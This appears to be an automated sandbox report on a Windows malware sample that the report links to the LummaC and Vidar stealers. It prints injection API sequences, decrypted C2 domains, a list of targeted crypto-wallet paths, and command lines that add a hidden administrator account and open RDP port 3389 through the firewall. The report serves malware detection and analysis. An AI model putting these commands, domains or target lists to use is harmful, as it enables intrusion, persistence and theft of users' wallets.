Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C77B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C77B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C77B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C77B1F7

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2828, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02AF2131 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02AF2131

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: EBAAFCAFCB.exe, 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wallkedsleeoi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C78008	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 119F008	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9CD008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EBAAFCAFCB.exe "C:\ProgramData\EBAAFCAFCB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECGDBFCBK.exe "C:\ProgramData\KECGDBFCBK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKEHIIJJEC.exe "C:\ProgramData\JKEHIIJJEC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EBAAFCAFCBKF" & exit	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_2490c46d /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Queries volume information: C:\ProgramData\EBAAFCAFCB.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Queries volume information: C:\ProgramData\KECGDBFCBK.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Queries volume information: C:\ProgramData\JKEHIIJJEC.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Source: RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3af5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3040, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia 